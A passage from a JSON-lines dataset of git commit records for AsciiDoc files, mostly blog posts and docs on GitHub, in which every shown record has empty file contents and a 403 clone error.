403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aae67e2528b2e97d395fc2d399ade7f1e1a968ba","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79730bfeba4ceb03dc03b4503958a79fa2362d4a","subject":"Create LICENSE.adoc","message":"Create LICENSE.adoc","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"LICENSE.adoc","new_file":"LICENSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08c51ab7ea1f5b68afc2335d11bd0262f8e84f74","subject":"Update 2017-05-03-Intro.adoc","message":"Update 
2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3fca1e22624eb62e8b9bb97f2d2be6b9f9d9ee1","subject":"Add a readme file for documentation. Fixes #151","message":"Add a readme file for documentation. Fixes #151\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"documentation\/README.adoc","new_file":"documentation\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/canoo\/dolphin-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfaf0fa7bf40fe01a4f723890a52ed57639e01e2","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4044dbc61b165f732ad1239a6fd12d555b266b9","subject":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff1f688659f59301ba8b5327a278e1950084378c","subject":"Update 2016-10-26-Episode-76-Steam-Saves-and-Managing-Friends.adoc","message":"Update 2016-10-26-Episode-76-Steam-Saves-and-Managing-Friends.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-10-26-Episode-76-Steam-Saves-and-Managing-Friends.adoc","new_file":"_posts\/2016-10-26-Episode-76-Steam-Saves-and-Managing-Friends.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fe913433c37c6f12848227369dffc59b04ec77e","subject":"ns Forms Guide","message":"ns Forms Guide\n\nFixes 
#157\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/ns-forms.adoc","new_file":"content\/guides\/ns-forms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"79bee2078049bae75399e8ccab0a60844af440af","subject":"Import the CCT Dev Book","message":"Import the CCT Dev Book\n","repos":"containers-tools\/cct,containers-tools\/cct","old_file":"docs\/devbook.adoc","new_file":"docs\/devbook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/containers-tools\/cct.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58c71eda28b50fe87358f623446f2e87d3d2b97b","subject":"Update 2019-07-23-Probabilistic-Graphical-Models-Message-Passing-in-Cluster-Graphs.adoc","message":"Update 2019-07-23-Probabilistic-Graphical-Models-Message-Passing-in-Cluster-Graphs.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-07-23-Probabilistic-Graphical-Models-Message-Passing-in-Cluster-Graphs.adoc","new_file":"_posts\/2019-07-23-Probabilistic-Graphical-Models-Message-Passing-in-Cluster-Graphs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e6f3e5ad215982b70d75762f42d8fed8b9fd91","subject":"y2b create post Asus Transformer Prime + XBOX 360 Controller","message":"y2b create post Asus Transformer Prime + XBOX 360 Controller","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Asus-Transformer-Prime--XBOX-360-Controller.adoc","new_file":"_posts\/2012-01-12-Asus-Transformer-Prime--XBOX-360-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaa05da9eeb1e4c45a6999f75e97cf4e2c508c35","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd6ca33968106807396b7aec535124039fdc4d4c","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"123f5035bb03d7241f9f37e967f3086843b5fee1","subject":"Update 2015-08-18-Another-post-to-test.adoc","message":"Update 2015-08-18-Another-post-to-test.adoc","repos":"abhayghatpande\/hubpress.io,abhayghatpande\/hubpress.io,abhayghatpande\/hubpress.io","old_file":"_posts\/2015-08-18-Another-post-to-test.adoc","new_file":"_posts\/2015-08-18-Another-post-to-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abhayghatpande\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd80062135dd0fdf80a7a2fd41cfe8e68b4e53bb","subject":"Update 2015-10-13-the-birthday-of-2015.adoc","message":"Update 2015-10-13-the-birthday-of-2015.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-10-13-the-birthday-of-2015.adoc","new_file":"_posts\/2015-10-13-the-birthday-of-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbf957afb48765cbb9cce95c835039d9a39a509c","subject":"Update 2015-06-19-Grails-Internacionalizacao-em-banco-de-dados-e-arquivos.adoc","message":"Update 2015-06-19-Grails-Internacionalizacao-em-banco-de-dados-e-arquivos.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-06-19-Grails-Internacionalizacao-em-banco-de-dados-e-arquivos.adoc","new_file":"_posts\/2015-06-19-Grails-Internacionalizacao-em-banco-de-dados-e-arquivos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91ed3a266e9cd21f02340700a8d72d589f12bb3b","subject":"Renamed '_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc' to '_posts\/2020-02-04-test-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc'","message":"Renamed '_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc' to '_posts\/2020-02-04-test-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc'","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-04-test-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_file":"_posts\/2020-02-04-test-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df7190113070390cb899e6845705f8f54787afd8","subject":"Update 2016-07-26-Dicas-de-seguranca-para-o-SSH-Introducao.adoc","message":"Update 2016-07-26-Dicas-de-seguranca-para-o-SSH-Introducao.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-26-Dicas-de-seguranca-para-o-SSH-Introducao.adoc","new_file":"_posts\/2016-07-26-Dicas-de-seguranca-para-o-SSH-Introducao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87d7f5e575ba8122e25c8e2fdbc35f3aa2f501c6","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7f3eb4b8d5eda244eb23e91df7ee18919809970","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"104fd82f87ea4833e60839d2aebd5ee248ee4304","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c7825b1f3af5e44ad3494b639d4f17b7c7a7b94","subject":"Update 2016-09-03-Title.adoc","message":"Update 2016-09-03-Title.adoc","repos":"bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io","old_file":"_posts\/2016-09-03-Title.adoc","new_file":"_posts\/2016-09-03-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bbsome\/bbsome.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8df27b47dc65f4ecf92a2de5a602e51edff010c3","subject":"Update 2017-02-01-hello.adoc","message":"Update 2017-02-01-hello.adoc","repos":"introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io","old_file":"_posts\/2017-02-01-hello.adoc","new_file":"_posts\/2017-02-01-hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/introspectively\/introspectively.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ac2b27ed5b9f2213dc3f641178455d7719a5aed","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 
2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24348020ddc9a51a137b9508debfc5b85dabcee7","subject":"Update \t2014-07-03-forge-2.7.0.final.asciidoc","message":"Update \t2014-07-03-forge-2.7.0.final.asciidoc","repos":"forge\/docs,luiz158\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,addonis1990\/docs,agoncal\/docs","old_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"39174938fa02622516e9b376b4d9caf859952d6f","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba58b0f7c0a5f26849430f694cf002840eb9496f","subject":"Update 2016-08-10-Main-Street-Electrical-Parade-Returns-to-Disneyland.adoc","message":"Update 2016-08-10-Main-Street-Electrical-Parade-Returns-to-Disneyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-08-10-Main-Street-Electrical-Parade-Returns-to-Disneyland.adoc","new_file":"_posts\/2016-08-10-Main-Street-Electrical-Parade-Returns-to-Disneyland.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e724c07a05371e899a8571c46d0b78161dc562e","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"512d647b1202d39925f0c47598d2449cf4ffea54","subject":"Update 2019-03-28-Setting-Content-Type-for-multipartform-data-values.adoc","message":"Update 
2019-03-28-Setting-Content-Type-for-multipartform-data-values.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2019-03-28-Setting-Content-Type-for-multipartform-data-values.adoc","new_file":"_posts\/2019-03-28-Setting-Content-Type-for-multipartform-data-values.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5435f082c62cc6142af613668e1a7f3664a879a9","subject":"Adds minor comments on client feedback","message":"Adds minor comments on client feedback\n","repos":"cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp","old_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/steps-fileupload.adoc","new_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/steps-fileupload.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortizqgithub\/csoftz-rp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06521f25159ab737a4078cdf54175233561f1780","subject":"Update 2016-12-22-teste.adoc","message":"Update 2016-12-22-teste.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2016-12-22-teste.adoc","new_file":"_posts\/2016-12-22-teste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2dff13e5a7a72d605a2ce537d9b56d2989a2711","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47e14683ca92a06804da8cef00b73e18998f6c6a","subject":"Update 2019-02-26-I-T50.adoc","message":"Update 2019-02-26-I-T50.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-26-I-T50.adoc","new_file":"_posts\/2019-02-26-I-T50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e8a98f333dd9d817cde44f91718478050221a41","subject":"Update 2011-11-04-J-A-X-London-2011.adoc","message":"Update 
2011-11-04-J-A-X-London-2011.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2011-11-04-J-A-X-London-2011.adoc","new_file":"_posts\/2011-11-04-J-A-X-London-2011.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77043628980d3e009b1ed956b350b617a1f78ad8","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb715c08478896601ce918ab201496dbdb21ec87","subject":"Update 2017-08-02-Fiddler-with-aspnet-core-and-configure-aspnet-core-as-a-reverse-proxy.adoc","message":"Update 2017-08-02-Fiddler-with-aspnet-core-and-configure-aspnet-core-as-a-reverse-proxy.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-08-02-Fiddler-with-aspnet-core-and-configure-aspnet-core-as-a-reverse-proxy.adoc","new_file":"_posts\/2017-08-02-Fiddler-with-aspnet-core-and-configure-aspnet-core-as-a-reverse-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b45dd251da8948148a333590d92456d1d33ec861","subject":"Very limited list of supported JSON-RPC methods","message":"Very limited list of supported JSON-RPC methods\n\nExpand it to cover the functionality of the current UI design.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fb58a7b5972e97ea673764e3cdce4fdcc648bde","subject":"Create 2015-06-15-forge-2.16.2.final.asciidoc","message":"Create 2015-06-15-forge-2.16.2.final.asciidoc","repos":"forge\/docs,luiz158\/docs,luiz158\/docs,forge\/docs","old_file":"news\/2015-06-15-forge-2.16.2.final.asciidoc","new_file":"news\/2015-06-15-forge-2.16.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"89bacc09136e27570c95edacbcc21ced0e8c2db9","subject":"Update 2017-07-10-How-To-Use-third-party-libraries-in-Jenkins-Pipeline.adoc","message":"Update 
2017-07-10-How-To-Use-third-party-libraries-in-Jenkins-Pipeline.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2017-07-10-How-To-Use-third-party-libraries-in-Jenkins-Pipeline.adoc","new_file":"_posts\/2017-07-10-How-To-Use-third-party-libraries-in-Jenkins-Pipeline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59cf547971e932d24a8582f22a257874a2918913","subject":"faq: initial import","message":"faq: initial import\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/faq.adoc","new_file":"userguide\/tutorials\/faq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e762e9e213b39647fc0836e9ad565203060e4ad","subject":"Update 2015-08-13-Hola-Hubpress.adoc","message":"Update 2015-08-13-Hola-Hubpress.adoc","repos":"Rackcore\/Rackcore.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,AlonsoCampos\/AlonsoCampos.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Rackcore\/Rackcore.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-08-13-Hola-Hubpress.adoc","new_file":"_posts\/2015-08-13-Hola-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae8053245ca60b89c36fad6154129f05e93b157a","subject":"Update 2018-07-11-The-confusing-Bash-configuration-files.adoc","message":"Update 2018-07-11-The-confusing-Bash-configuration-files.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-07-11-The-confusing-Bash-configuration-files.adoc","new_file":"_posts\/2018-07-11-The-confusing-Bash-configuration-files.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4626b0b72b5c7c6d6343e5c712eec121c67ce84","subject":"Update 2015-05-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Update 
